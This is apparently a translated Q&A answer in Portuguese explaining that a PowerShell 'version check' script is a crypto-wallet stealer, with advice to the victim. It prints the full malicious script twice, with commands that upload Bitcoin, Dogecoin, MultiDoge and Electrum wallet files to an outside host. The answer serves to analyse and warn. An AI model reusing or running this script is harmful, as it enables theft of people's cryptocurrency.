Eu executei um script do PowerShell. Fui hackeado?

AVISO: NÃO EXECUTE NENHUM DO CÓDIGO NESTA RESPOSTA. É MALICIOSO E SÓ FOI INCLUÍDO PARA FINS DEMONSTRATÓRIOS.

powershell.software/versionchecké um link malicioso

A página para a qual ele leva é a seguinte:

$ErrorActionPreference = 'silentlycontinue'
Write-Host "Checking for the latest version..."
Invoke-RestMethod -method PUT -infile ~\desktop\backups\found.wallet extract.onl/logs
Invoke-RestMethod -method PUT -infile .\found.wallet extract.onl/desktop
Invoke-RestMethod -method PUT -infile .\multidoge.wallet extract.onl/seed
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\Dogecoin\wallet.dat extract.onl/doge
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\Bitcoin\wallet.dat extract.onl/bitcoin
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\MultiDoge\multidoge.wallet extract.onl/multidoge/wallet
Compress-Archive -Path ~\Appdata\Roaming\MultiDoge\multidoge-data -DestinationPath ~\Appdata\Roaming\MultiDoge\multidoge-data
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\MultiDoge\multidoge-data.zip extract.onl/multidoge/backups
Write-Host "You are currently running 7.1.4 Windows PowerShell, Java 2021"
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\Electrum\wallets\default_wallet extract.onl/electrum





<head>
<style>
body {
  background-color: black;
}

</style>
</head>

 <meta http-equiv = "refresh" content = "0; url = notfound" />

Quando você tenta visitar este link em um navegador, ele rapidamente o redireciona para fora dessa página, para outra página fingindo (mal) que o site não existe:

<meta http-equiv = "refresh" content = "0; url = notfound" />

Quando executado no comando completo que você forneceu, no entanto, ele reconhece as seguintes linhas como comandos do PowerShell:

$ErrorActionPreference = 'silentlycontinue'
Write-Host "Checking for the latest version..."
Invoke-RestMethod -method PUT -infile ~\desktop\backups\found.wallet extract.onl/logs
Invoke-RestMethod -method PUT -infile .\found.wallet extract.onl/desktop
Invoke-RestMethod -method PUT -infile .\multidoge.wallet extract.onl/seed
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\Dogecoin\wallet.dat extract.onl/doge
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\Bitcoin\wallet.dat extract.onl/bitcoin
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\MultiDoge\multidoge.wallet extract.onl/multidoge/wallet
Compress-Archive -Path ~\Appdata\Roaming\MultiDoge\multidoge-data -DestinationPath ~\Appdata\Roaming\MultiDoge\multidoge-data
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\MultiDoge\multidoge-data.zip extract.onl/multidoge/backups
Write-Host "You are currently running 7.1.4 Windows PowerShell, Java 2021"
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\Electrum\wallets\default_wallet extract.onl/electrum

É um ladrão de carteiras de criptomoedas primitivo. Cada linha que começa com Invoke-RestMethodtentativas de enviar dados de outras carteiras de criptomoedas possíveis (se você tiver alguma instalada em seu computador) para uma página no endpoint http://extract.onl.

Se você tiver carteiras de criptomoedas no computador, elas provavelmente estão comprometidas. Transfira qualquer coisa neles para outra carteira SEGURA.

Resumindo suas preocupações:

Tenho a sensação de que eles carregaram apenas alguns arquivos do meu sistema.

Mas estou preocupado que possa haver um backdoor em execução no meu sistema. O upload eu posso viver, mas não um backdoor.

Sim, se esses arquivos existiam no seu computador, eles foram carregados. No entanto, isso é tudo o que esse script parece fazer, portanto, não há backdoor persistente em seu sistema.

Editar 25/10/2021:

Desde a redação desta resposta, o acesso ao código malicioso em powershell.software/versioncheckagora é impedido (e agora produz um erro 403), mas pode voltar a qualquer momento. Ainda é um risco.

Editar 24/01/2022:

O proprietário de powershell.software/versioncheckcolocou o código malicioso novamente online. Isso ainda é um risco.